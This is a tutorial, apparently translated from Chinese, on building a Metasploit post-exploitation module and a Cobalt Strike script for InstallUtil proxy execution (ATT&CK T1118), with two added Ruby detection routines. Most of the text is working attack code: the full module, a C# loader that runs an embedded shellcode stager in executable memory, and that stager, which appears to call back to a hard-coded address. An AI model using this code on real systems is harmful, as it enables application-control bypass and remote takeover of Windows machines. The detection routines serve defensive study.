Writing a Metasploit Post-Exploitation Module: ATT&CK T1118


1. T1118

Adversaries can use InstallUtil to proxy code execution through a trusted Windows utility. InstallUtil is a command-line utility that installs and uninstalls resources by executing the installer components specified in a .NET binary. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and lives in the .NET directories of a Windows system: `C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe` and `C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe`.

InstallUtil can also be used to bypass application control, because it executes whichever class in the supplied binary is decorated with the attribute `[System.ComponentModel.RunInstaller(true)]`.
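
The defender's view of the technique just described, as an added example that is not code from the original post or from Metasploit: the Ruby below evaluates constructed Sysmon-style process-creation events and flags the InstallUtil invocation patterns this page later relies on, namely the /U uninstall method with logging suppressed (`/logfile=` and `/LogToConsole=false`), the /? HelpText method handed an assembly, an assembly loaded from a user-writable path, and an installutil.exe running from outside the .NET Framework directory. The event field names (`:image`, `:command_line`) and the sample events are assumptions constructed for the example.

```ruby
# Added example, not code from the original post or from Metasploit: a small
# detection routine for InstallUtil proxy execution (ATT&CK T1118), evaluated
# over constructed Sysmon-style process-creation events. The fields :image and
# :command_line are assumptions modelled on Sysmon Event ID 1.

# Where InstallUtil legitimately lives; a copy running from elsewhere is notable.
DOTNET_FRAMEWORK_DIR = %r{\A[a-z]:\\windows\\microsoft\.net\\framework(64)?\\v[\d.]+\\}i
# Locations an unprivileged user can write to.
WRITABLE_PATH = %r{\\(temp|tmp|users\\[^\\]+\\(appdata|downloads|desktop))\\}i

# Split a Windows command line into tokens, keeping double-quoted paths whole.
def tokenize(command_line)
  command_line.scan(/"[^"]*"|\S+/).map { |t| t.delete('"') }
end

def installutil_image?(image)
  File.basename(image.tr('\\', '/')).casecmp?('installutil.exe')
end

# Reasons an event looks like T1118; empty for non-InstallUtil executions and
# for ordinary installs (/i of an assembly under Program Files, for example).
def installutil_reasons(event)
  image = event[:image].to_s
  return [] unless installutil_image?(image)

  tokens   = tokenize(event[:command_line].to_s).drop(1)   # drop the image itself
  flags    = tokens.select { |t| t.start_with?('/') }.map(&:downcase)
  assembly = tokens.reject { |t| t.start_with?('/') }.last.to_s
  reasons  = []

  reasons << 'installutil_outside_dotnet_dir' unless image.match?(DOTNET_FRAMEWORK_DIR)
  reasons << 'uninstall_method' if flags.include?('/u')
  reasons << 'logging_suppressed' if flags.include?('/logfile=') || flags.include?('/logtoconsole=false')
  reasons << 'helptext_with_assembly' if flags.include?('/?') && !assembly.empty?
  reasons << 'assembly_in_writable_path' if assembly.match?(WRITABLE_PATH)
  reasons
end

# Alert on the combinations the page's own commands produce, not on every
# InstallUtil run: /U alone is how legitimate services are uninstalled.
def suspicious?(reasons)
  reasons.include?('helptext_with_assembly') ||
    reasons.include?('assembly_in_writable_path') ||
    reasons.include?('installutil_outside_dotnet_dir') ||
    (reasons.include?('uninstall_method') && reasons.include?('logging_suppressed'))
end

def triage(events)
  events.map do |e|
    reasons = installutil_reasons(e)
    { id: e[:id], alert: suspicious?(reasons), reasons: reasons }
  end
end

# Constructed sample events (not real telemetry). Events 1 and 2 mirror the
# commands used later on this page; 3 is a vendor installer; 4 is csc.exe.
SAMPLE_EVENTS = [
  { id: 1, image: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe',
    command_line: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\windows\temp\t1118.dll' },
  { id: 2, image: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe',
    command_line: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll' },
  { id: 3, image: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe',
    command_line: '"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /i "C:\Program Files\Vendor\Service.exe"' },
  { id: 4, image: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe',
    command_line: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\windows\temp\t1118.dll C:\windows\temp\t1118.tmp' }
]

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_EVENTS).each do |r|
    puts "event #{r[:id]}: alert=#{r[:alert]} #{r[:reasons].join(', ')}"
  end
end
```

The reasons are kept separate from the verdict so that the thresholds can be tuned per environment: an `/i` install of an assembly under Program Files produces no reasons at all, while the page's `/U /logfile= /LogToConsole=false` invocation of a DLL in `C:\windows\temp` produces three.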

2. T1118 POC

InstallUtil HelpText method call

Step one:

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
```

Step two:

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
```

HelpText call:

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll
```


3. Writing the module

Approach:

Since T1118 belongs to the post-exploitation phase, once a session has been obtained the module performs the following steps:

1. Upload the source code.

2. Compile the DLL with csc.

3. Invoke InstallUtil.exe to load the DLL.

Options that need to be defined:

1. Path to the local C# source

2. Upload path on Windows

3. .NET version

We create a new folder under both /usr/share/metasploit-framework/modules/post/windows/ and /usr/share/metasploit-framework/data/, named secist in this article; it holds the ATT&CK-related attack modules.

Then create a new Ruby file and name it t1118.rb.


3.1 Initializing the module

Refer to the official guide on writing post modules: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module

Define the module's initialization info (the complete module in section 4 shows the full block).


Register the options:

```ruby
OptString.new('RFILE', [ false, '上传到windows路径', 'C:\\windows\\temp\\t1118.tmp' ]),
OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "secist", "t1118", "t1118.cs") ]),
OptBool.new('CLEANUP_FILE', [ true, "清理文件", true ]),
OptString.new('DOTNET_VERSION', [ true, 'DotNet Version', 'v4.0.30319' ]),
```

Define what the run command executes. The skeleton below only checks the session type and reports success; the real body is filled in under 3.4.

```ruby
def run
  begin
    return 0 if session.type != "meterpreter"
    print_good("模块T1118执行成功")
  rescue ::Exception => e
    print_status("Unable to execute: #{e.message}")
    print_error("模块T1118执行失败")
    return
  end
end
```

3.2 Defining the local file and the upload file

Define remote_file and local_file, which read datastore['RFILE'] and datastore['LFILE'] respectively. When RFILE is left empty, the remote name falls back to the basename of the local file.

```ruby
def remote_file
  if datastore['RFILE'].blank?
    remote_name = File.basename(datastore['LFILE'])
  else
    remote_name = datastore['RFILE']
  end

  remote_name
end

def local_file
  datastore['LFILE']
end
```

3.3 Removing the uploaded source

```ruby
def clean_file
  print_status("Removing files...")
  register_file_for_cleanup(datastore['RFILE'])
end
```

Note that register_file_for_cleanup only schedules the deletion; FileDropper performs it when the module's cleanup runs. Only RFILE (the uploaded source) is registered, so the compiled t1118.dll remains on disk, and the CLEANUP_FILE option registered above is not consulted here.

3.3 Defining the cmd command

Run commands through run_cmd. With io set to true the command runs through cmd_exec and its output is printed; with io set to false it is started as a hidden process via session.sys.process.execute and no output is captured.

```ruby
def run_cmd(user_cmd, io = true)
  cmd = "cmd /c #{user_cmd}"
  begin
    print_status("Executing '#{cmd}' on #{session.inspect}")
    if io
      res = cmd_exec(cmd)
      if res
        print_warning(res)
      end
    else
      res = session.sys.process.execute(cmd, nil, {'Hidden' => true})
    end
  rescue ::Exception => e
    print_error("Unable to execute: #{e.message}")
    return
  end
end
```

3.4 Uploading the file and executing the command

This step does the following:

1. Upload the local /usr/share/metasploit-framework/data/secist/t1118/t1118.cs to C:\windows\temp\t1118.tmp

2. Compile t1118.tmp with csc.exe

3. Invoke the compiled DLL with InstallUtil

4. Delete the source file

```ruby
def run
  begin
    return 0 if session.type != "meterpreter"
    rfile = remote_file()
    lfile = local_file()
    dotnet_version = datastore['DOTNET_VERSION']
    base = 'C:\Windows\Microsoft.NET\Framework'

    csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
    installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'

    upload_file(rfile, lfile)

    # C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
    cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile})
    print_status("Compiling...")
    run_cmd(cmd)

    sleep(2)
    # C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
    cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll)
    print_status("Executing InstallUtil...")
    run_cmd(cmd, false)
    print_good("模块T1118执行成功")
    sleep(2)
    clean_file()
    print_good("清理缓存成功")
  rescue ::Exception => e
    print_status("Unable to execute: #{e.message}")
    print_error("模块T1118执行失败")
    return
  end
end
```
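
The upload, compile, execute sequence above leaves a recognisable pattern in process telemetry: csc.exe writing a DLL under C:\windows\temp, then InstallUtil.exe loading that same DLL on the same host a couple of seconds later. As an added example that is not code from the original post or from Metasploit, the Ruby below correlates those two events over constructed Sysmon-style process-creation records. The field names (`:host`, `:time`, `:image`, `:command_line`), hostnames, timestamps and the 300-second window are assumptions made for the example.

```ruby
# Added example, not code from the original post or from Metasploit: correlates
# the compile-then-execute chain described above (csc.exe emitting a DLL, then
# InstallUtil.exe loading that same DLL on the same host) over constructed
# Sysmon-style process-creation records. Field names, hostnames, timestamps
# and the 300-second window are assumptions made for this example.

CORRELATION_WINDOW = 300 # seconds allowed between compile and execution (assumed)

# Split a Windows command line into tokens, keeping double-quoted paths whole.
def tokenize(command_line)
  command_line.scan(/"[^"]*"|\S+/).map { |t| t.delete('"') }
end

def basename_of(path)
  File.basename(path.tr('\\', '/'))
end

# csc.exe /out:<dll> <source>  ->  { dll:, source: }; nil for any other process.
def parse_csc(event)
  return nil unless basename_of(event[:image].to_s).casecmp?('csc.exe')
  tokens = tokenize(event[:command_line].to_s).drop(1)
  out = tokens.find { |t| t.downcase.start_with?('/out:') }
  return nil unless out
  { dll: out[5..-1], source: tokens.reject { |t| t.start_with?('/') }.last.to_s }
end

# installutil.exe [flags] <assembly>  ->  { assembly: }; nil for any other process.
def parse_installutil(event)
  return nil unless basename_of(event[:image].to_s).casecmp?('installutil.exe')
  tokens = tokenize(event[:command_line].to_s).drop(1)
  { assembly: tokens.reject { |t| t.start_with?('/') }.last.to_s }
end

# Walk events in time order, remember each DLL csc produced per host, and report
# an InstallUtil execution of that DLL that follows within the window.
def correlate(events)
  compiled = {}   # [host, dll downcased] => csc event merged with its parsed fields
  matches  = []
  events.sort_by { |e| e[:time] }.each do |e|
    if (c = parse_csc(e))
      compiled[[e[:host], c[:dll].downcase]] = e.merge(c)
    elsif (u = parse_installutil(e))
      c = compiled[[e[:host], u[:assembly].downcase]]
      next unless c
      delta = e[:time] - c[:time]
      next if delta < 0 || delta > CORRELATION_WINDOW
      matches << { host: e[:host], dll: u[:assembly], source: c[:source], delta: delta.round,
                   # compiling a source that is not a .cs file (the module uses .tmp) is itself odd
                   source_not_cs: !c[:source].downcase.end_with?('.cs') }
    end
  end
  matches
end

T0   = Time.utc(2024, 1, 1, 10, 0, 0)
FX32 = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319'
FX64 = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319'

# Constructed records (not real telemetry). WS01 mirrors the module's flow:
# compile from C:\windows\temp, InstallUtil two seconds later. WS02 is an
# uncorrelated vendor install; WS03 compiles a project and installs it an hour later.
CHAIN_EVENTS = [
  { host: 'WS01', time: T0,        image: "#{FX32}\\csc.exe",
    command_line: "#{FX32}\\csc.exe /out:C:\\windows\\temp\\t1118.dll C:\\windows\\temp\\t1118.tmp" },
  { host: 'WS01', time: T0 + 2,    image: "#{FX32}\\installutil.exe",
    command_line: "#{FX32}\\installutil.exe /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll" },
  { host: 'WS02', time: T0 + 5,    image: "#{FX64}\\InstallUtil.exe",
    command_line: "\"#{FX64}\\InstallUtil.exe\" /i \"C:\\Program Files\\Vendor\\Service.exe\"" },
  { host: 'WS03', time: T0,        image: "#{FX32}\\csc.exe",
    command_line: "#{FX32}\\csc.exe /out:C:\\build\\App.dll C:\\build\\Program.cs" },
  { host: 'WS03', time: T0 + 3600, image: "#{FX32}\\installutil.exe",
    command_line: "#{FX32}\\installutil.exe /i C:\\build\\App.dll" }
]

if __FILE__ == $PROGRAM_NAME
  correlate(CHAIN_EVENTS).each do |m|
    puts "#{m[:host]}: #{m[:source]} -> #{m[:dll]} run by InstallUtil after #{m[:delta]}s (non-.cs source: #{m[:source_not_cs]})"
  end
end
```

Keying on the DLL path rather than on the process names alone is what keeps the build machine (WS03) out of the results: the same two binaries appear there too, but an hour apart and on a .cs source, so neither the window nor the source-extension check fires.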

Initial options of the loaded t1118 module (screenshot).

After running the POC (screenshot).

After filling the POC with shellcode and running it (screenshots).

Demo (screenshot).

4. Complete code

Add the library to /usr/share/metasploit-framework/lib/msf/core/post/windows.rb:

```ruby
require 'msf/core/post/windows/secist'
```

Define the library file /usr/share/metasploit-framework/lib/msf/core/post/windows/secist.rb:

```ruby
# -*- coding: binary -*-

module Msf
class Post
module Windows

module Secist

  # Remote path of the uploaded file
  def remote_file
    if datastore['RFILE'].blank?
      remote_name = File.basename(datastore['LFILE'])
    else
      remote_name = datastore['RFILE']
    end

    remote_name
  end

  # Local file
  def local_file
    datastore['LFILE']
  end

  # Clean up the uploaded file
  def clean_file
    print_status("Removing files...")
    register_file_for_cleanup(datastore['RFILE'])
  end

  # Run a cmd command
  def run_cmd(user_cmd, io = true)
    cmd = "cmd /c #{user_cmd}"
    begin
      print_status("Executing '#{cmd}' on #{session.inspect}")
      if io
        res = cmd_exec(cmd)
        if res
          print_warning(res)
        end
      else
        res = session.sys.process.execute(cmd, nil, {'Hidden' => true})
      end
    rescue ::Exception => e
      print_error("Unable to execute: #{e.message}")
      return
    end
  end

end # Secist
end # Windows
end # Post
end # Msf
```

Module file /usr/share/metasploit-framework/modules/post/windows/secist/t1118.rb:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Exploit::FileDropper
  include Post::Windows::Secist

  def initialize(info={})
    super(update_info(info,
      'Name'         => 'InstallUtil (T1118) Windows',
      'Description'  => %q{
        ATT&CK 模块编写 T1118 },
      'License'      => MSF_LICENSE,
      'Author'       => [ 'Secist-demon' ],
      'References'   => [
        [ 'URL', 'https://attack.mitre.org/wiki/Technique/T1118' ],
        [ 'URL', 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118' ],
        [ 'URL', 'https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260' ],
        [ 'URL', 'https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb' ]
      ],
      'Platform'     => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))
    register_options(
      [
        OptString.new('RFILE', [ false, '上传到windows路径', 'C:\\windows\\temp\\t1118.tmp' ]),
        OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "secist", "t1118", "t1118.cs") ]),
        OptBool.new('CLEANUP_FILE', [ true, "清理文件", true ]),
        OptString.new('DOTNET_VERSION', [ true, 'DotNet Version', 'v4.0.30319' ]),
      ])
  end

  def run
    begin
      return 0 if session.type != "meterpreter"
      rfile = remote_file()
      lfile = local_file()
      dotnet_version = datastore['DOTNET_VERSION']
      base = 'C:\Windows\Microsoft.NET\Framework'

      csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
      installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'

      upload_file(rfile, lfile)
      cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile})
      print_status("Compiling...")
      run_cmd(cmd)
      sleep(2)
      cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll)
      print_status("Executing InstallUtil...")
      run_cmd(cmd, false)
      print_good("模块T1118执行成功")
      sleep(2)
      clean_file()
      print_good("清理缓存成功")
    rescue ::Exception => e
      print_status("Unable to execute: #{e.message}")
      print_error("模块T1118执行失败")
      return
    end
  end
end
```

T1118.cs

```csharp
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:exeshell.exe exeshell.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
See https://gist.github.com/subTee/0dc27475f141cc3a1b50 for details.
*/
namespace Exec
{
    public class Program
    {
        public static void Main()
        {
            Console.WriteLine("Hello From Main...I Don't Do Anything");
            //Add any behaviour here to throw off sandbox execution/analysts :)
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        private static UInt32 MEM_RELEASE = 0x8000;

        //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            //ShellCode.DoEvil();

            byte[] buf = new byte[798] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x58, 0x4c, 0x77, 0x41, 
            0x00, 0xf1, 0x72, 0x1c, 0xdc, 0x6a, 0x4a, 0x7d, 0x3b, 0x48, 0x25, 0xdd, 0xd0, 0x7d, 0xc5, 0x05, 0xed, 0xa2, 0x7d, 0x45, 0x28, 0x10, 0x9c, 0x8c, 0xb1, 0x4e, 0x60, 0x5b, 0xba, 0xa3, 0x59, 0x65, 0x6f, 0xc3, 0x23, 0x8a, 0x66, 0xe1, 0x0a, 0xa1, 0xb9, 0xc5, 0xba, 0xd9, 0xda, 0xb9, 0x3e, 0x44, 0xb2, 0x44, 0xf5, 0xac, 0x7b, 0x12, 0x7a, 0x72, 0xf0, 0xd9, 0x5c, 0xf1, 0x66, 0x46, 0xe8, 0x64, 0xe0, 0x95, 0xc5, 0x17, 0x2a, 0x8d, 0x85, 0xa1, 0xda, 0xfb, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x38, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x29, 0x0d, 0x0a, 0x00, 0x63, 0xbd, 0xd9, 0x1f, 0x5e, 0xec, 0x46, 0x7a, 0xf0, 0x58, 0x92, 0x00, 0x87, 0x53, 0x08, 0xb0, 0xc5, 0x3a, 0x3b, 0xc6, 0x8a, 0xde, 0x7e, 0xac, 0x96, 0xa4, 0x3d, 0x95, 0x9a, 0x3c, 0x13, 0x19, 0x93, 0x8a, 0x64, 0x3f, 0x06, 0x48, 0x7e, 0xe5, 0xe5, 0x5f, 0x68, 0x40, 0xd9, 0x67, 0x04, 0x95, 0x6c, 0x1b, 0x1f, 0x25, 0xee, 0xdc, 0x01, 0x00, 0xe0, 0xca, 0xce, 0xd6, 0x5e, 0x7b, 0xd7, 0xe4, 0xc9, 0x0a, 0xde, 0xc0, 0x9c, 0xa6, 0xb5, 0xbc, 0x06, 0xd7, 0x86, 0xef, 0xf1, 0xf8, 0xa3, 0x51, 0x05, 0x5b, 0xd6, 0x2f, 0x19, 0x52, 0x77, 0x42, 0x09, 0x84, 0xe3, 0xc5, 0x1b, 0xf5, 0x1d, 0x0d, 0x73, 0x2d, 0x1b, 0x38, 0xcc, 0x08, 0xd6, 0x2f, 0x83, 0x4c, 0x51, 0x0a, 0x60, 0x46, 0x28, 0x66, 0x6e, 0xea, 0x53, 0x08, 0x99, 0x0a, 0x92, 0x68, 0x88, 0xd8, 0x41, 0x3e, 0x1c, 0x16, 0x1a, 0x46, 0x31, 0x8c, 0xe4, 0xa8, 0x8c, 0xc5, 0xe3, 0xf0, 0x9a, 0x07, 0x1e, 0x2c, 0x8c, 0x74, 0x24, 0x14, 0x26, 0xab, 0xed, 0xba, 0x0f, 0xc2, 0x80, 0xa5, 0xa5, 0x1b, 0xb3, 0x6c, 0xa0, 0x09, 0x55, 0xae, 0x66, 0xba, 0x95, 0x98, 0x0a, 0x7e, 0x6a, 0x6a, 0xc1, 0x03, 0x98, 0xc9, 0xfd, 0x4e, 0xde, 0x58, 0x20, 0x68, 0x6a, 0x87, 0xa7, 0xb8, 0xba, 0xf0, 0x31, 0x3a, 0x6a, 0x27, 0x81, 0xb5, 0x5b, 0x86, 0x7d, 
            0xb7, 0x08, 0x74, 0x53, 0x98, 0xb2, 0x59, 0x07, 0xe5, 0x1c, 0x85, 0xe9, 0x52, 0xef, 0x30, 0xfb, 0x16, 0xf4, 0xa1, 0xfc, 0x6a, 0x98, 0x19, 0x2a, 0x1e, 0xe1, 0x09, 0x3b, 0x39, 0x52, 0x4b, 0x91, 0x45, 0xb8, 0x74, 0xf2, 0x0f, 0xcf, 0xa9, 0xfa, 0x15, 0xc4, 0x5b, 0x47, 0xe7, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x39, 0x30, 0x2e, 0x31, 0x37, 0x00, 0x66, 0x00, 0x00, 0x00 };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)buf.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(buf, 0, (IntPtr)(funcAddr), buf.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // prepare data
            PROCESSOR_INFO info = new PROCESSOR_INFO();
            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));
            Marshal.StructureToPtr(info, pinfo, false);

            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            // retrieve data
            info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));
            Marshal.FreeHGlobal(pinfo);
            CloseHandle(hThread);
            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);
        }

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(string moduleName);

        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(string lpFileName);

        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESSOR_INFO
        {
            public UInt32 dwMax;
            public UInt32 id0;
            public UInt32 id1;
            public UInt32 id2;
            public UInt32 dwStandard;
            public UInt32 dwFeature;

            // if AMD
            public UInt32 dwExt;
        }
    }
}
```

The Cobalt Strike version follows the same approach and structure.

Below is a demonstration of the Aggressor script I have written (screenshot):

```
# demonsec666
sub t1118 {
    bupload($bid, $3['payloadfile']);
    bmv($bid, "t1118.cs", $3['rfile']);
    elog("已上传文件");
    bexecute($bid, "C:\\Windows\\Microsoft.NET\\Framework\\".$3['dotnet_version']."\\csc.exe /out:".$3['rdll']." ".$3['rfile']);
    elog("已生成文件");
    bpause($bid, int(3000));
    bexecute($bid, "C:\\Windows\\Microsoft.NET\\Framework\\".$3['dotnet_version']."\\InstallUtil.exe /U /logfile= /logtoconsole=false ".$3['rdll']);
    elog("已执行文件");
    bpause($bid, int(3000));
    brm($bid, $3['rfile']);
    elog("已删除缓存文件");
}

popup beacon_bottom {
    menu "&ATT&CK" {
        item "T1118" {
            $bid = $1;
            $dialog = dialog("T1118", %(rfile => "C:\\Windows\\Temp\\t1118.tmp", rdll => 'C:\\windows\\temp\\t1118.dll', dotnet_version => 'v4.0.30319'), &t1118);
            drow_file($dialog, "payloadfile", "Payload:");
            drow_text($dialog, "rfile", "上传远程路径:");
            drow_text($dialog, "rdll", "生成dll路径:");
            drow_text($dialog, "dotnet_version", "dotnet 版本:");
            dbutton_action($dialog, "Go");
            dialog_show($dialog);
        }
    }
}
```

References:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md#atomic-test-7---installutil-helptext-method-call

https://attack.mitre.org/techniques/T1218/004/

